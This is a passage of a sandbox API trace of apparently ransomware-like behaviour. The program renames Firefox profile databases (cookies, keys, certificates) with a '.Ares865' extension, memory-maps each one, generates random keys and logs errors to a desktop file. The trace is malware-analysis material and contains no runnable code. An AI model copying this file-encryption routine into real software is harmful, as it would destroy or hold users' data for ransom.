HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb64f2970, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d8360c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d8360c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0046.913] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.913] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d85c220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d85c220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0046.918] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82329dd0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4d85c220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d85c220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0046.922] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f6de30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d85c220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d85c220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0046.926] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.926] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0046.929] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.929] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb7f6de30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0046.944] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6518ad0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d882380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d882380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0050.069] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25a8 [0050.780] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\* FindFirstFile error 3\r\n") returned 292 [0050.780] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\* FindFirstFile error 3\r\n") returned 292 [0050.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0050.780] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x190c [0050.780] WriteFile (in: hFile=0x164, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0050.780] CloseHandle (hObject=0x164) returned 1 [0050.785] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0050.785] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\* FindFirstFile error 3\r\n") returned 292 [0050.786] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\* FindFirstFile error 3\r\n") returned 292 [0050.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0050.786] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1a30 [0050.786] WriteFile (in: hFile=0x164, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0050.786] CloseHandle (hObject=0x164) returned 1 [0050.787] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0050.931] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\* FindFirstFile error 3\r\n") returned 292 [0050.931] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\* FindFirstFile error 3\r\n") returned 292 [0050.931] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0050.931] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1b54 [0050.932] WriteFile (in: hFile=0x164, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0050.932] CloseHandle (hObject=0x164) returned 1 [0050.933] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2448 [0051.219] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5016bda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5016bda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.222] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.Ares865") returned 105 [0051.222] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.ares865"), dwFlags=0x1) returned 1 [0051.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.224] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=65536) returned 1 [0051.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.225] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.226] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.226] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.226] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x118 [0051.228] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x420000 [0051.231] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.232] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.232] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb08 [0051.233] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.Ares865") returned 117 [0051.233] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.234] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=229376) returned 1 [0051.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.234] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.235] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.235] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.235] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x38300, lpName=0x0) returned 0x118 [0051.237] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x38300) returned 0x420000 [0051.246] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.247] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.247] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb08 [0051.250] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.Ares865") returned 111 [0051.250] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.251] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=524288) returned 1 [0051.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.251] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.252] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.252] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.252] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x118 [0051.254] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x420000 [0051.281] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.282] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.282] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb08 [0051.289] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.Ares865") returned 113 [0051.289] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.290] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=98304) returned 1 [0051.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.291] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.291] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.291] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.291] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x118 [0051.293] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0x420000 [0051.298] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.299] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.299] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb08 [0051.305] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.Ares865") returned 114 [0051.305] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.ares865"), dwFlags=0x1) returned 1 [0051.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0051.306] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=458752) returned 1 [0051.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0051.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f88 [0051.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0051.306] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0051.307] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0051.307] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.307] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x70300, lpName=0x0) returned 0x118 [0051.308] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x70300) returned 0x420000 [0051.327] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0051.327] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0051.327] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0051.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb08 [0051.334] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.Ares865") returned 104 [0051.334] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\key3.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application 